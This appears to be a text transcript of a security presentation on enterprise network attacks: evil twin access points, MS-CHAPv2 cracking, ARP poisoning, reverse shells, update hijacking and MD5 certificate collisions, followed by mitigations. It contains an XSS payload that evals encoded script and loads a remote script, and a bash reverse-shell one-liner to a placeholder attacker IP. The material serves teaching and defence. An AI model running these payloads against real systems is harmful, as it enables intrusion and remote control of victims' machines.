Breaking Bad: Enterprise Network Security
-
Upload
navneet-kumar -
Category
Software
-
view
43 -
download
0
Transcript of Breaking Bad: Enterprise Network Security
![Page 1: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/1.jpg)
Enterprise Network Security
Navneet Kumar
![Page 2: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/2.jpg)
Overview
• Demo• OSI Protocols Overview• Evil Twin Attack• Cryptanalysis : MS-CHAPv2• ARP poisoning• POST-MITM Attack vectors• Reverse Shell• Mitigations• Certificate Collision Attack
Note: Some Images in this presentation has been taken from web for illustration
![Page 3: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/3.jpg)
SilverFish Worm
XSS
NPAPI runtime
Shell
<img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')
masterPlugin.updatePlugin(“attacker-plugin”,success,failure)
Netcat Shell / ssh daemon / Bounjour
Hatching rate = ng
n=Average # of endpoints per meetingg=# of generation
g=0
g=1
g=2
![Page 4: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/4.jpg)
802.11
ARP
Target Protocols
Attack Vectors
![Page 5: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/5.jpg)
802.11
![Page 6: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/6.jpg)
Evil twin attack
![Page 7: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/7.jpg)
Fake Certificate Exchange
![Page 8: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/8.jpg)
Soft AP
• Put WNIC in Master Mode and use Forged CA cert• Configure AP SSID to “bjn-int”• DAUTH to actual AP
Network
• Setup DNS• Setup DHCP
Routing
• Redirect 80,443 packets to proxy port• Forward traffic after NAT
Capture
• Use Same CA cert for signing• Sniff in proxy
Attack Setup
Note: Chrome uses certificate pinning for *.google.com
![Page 9: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/9.jpg)
Fake BSSID
Highest Strength2.4 GHz Channel
Wireless Scan
![Page 10: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/10.jpg)
Victim’s Client
![Page 11: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/11.jpg)
WTF !!!
Certificate Forgery
![Page 12: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/12.jpg)
Soft AP DHCP
Routing Proxy
![Page 13: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/13.jpg)
Cryptanalysis of MS-CHAPv2
ChallengeHash = SHA1(random|| username)[0:8]
ChallengeHash
ChallengeResponse
Note: Original complexity analysis has been done by Moxie Marlinspike
![Page 14: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/14.jpg)
Cryptanalysis of MS-CHAPv2
Note: Original complexity analysis has been done by Moxie Marlinspike
7 byte 7 byte 2 byte
Complexity = 256
time < 24 hrs ( 100% success )
![Page 15: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/15.jpg)
ARP poisoning
![Page 16: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/16.jpg)
POST-MITM Attack Vectors
Reverse Shell
Bind Shell
Session Hijacking
Above L3 Attacks
![Page 17: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/17.jpg)
Reverse Bind Shell
• Give a network shell to attacker• Works Behind NAT• Gets Root Access
HOW ????
$ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1
![Page 18: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/18.jpg)
https://tools.google.com/service/update2
https://swdl.bluejeans.com
https://aus4.mozilla.org/update/*/update.xml
smb://MVAV01/SophosUpdate
(Auto)Updates
Depl
oy P
aylo
ad w
ith u
pdat
es
![Page 19: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/19.jpg)
Mitigation
Pre-deployment of enterprise wide CA
SSL Cert Pinning for updates
Proper WIPS Configuration
Arp Spoof Mitigations
Careful CA signing
![Page 20: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/20.jpg)
Certificate Collision Attack
CADomainA
isCA?
CSR Ekey[Sha(csr.tbs)]
DomainAisCA?
DomainAisCA?
CertificateCSR.TBS
Sha( domainA.csr ) Sha( domainB.csr )
md5( domainA.csr )
md5( domainB.csr )
True
False
MD5 CollisionCertificate Collision
![Page 21: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/21.jpg)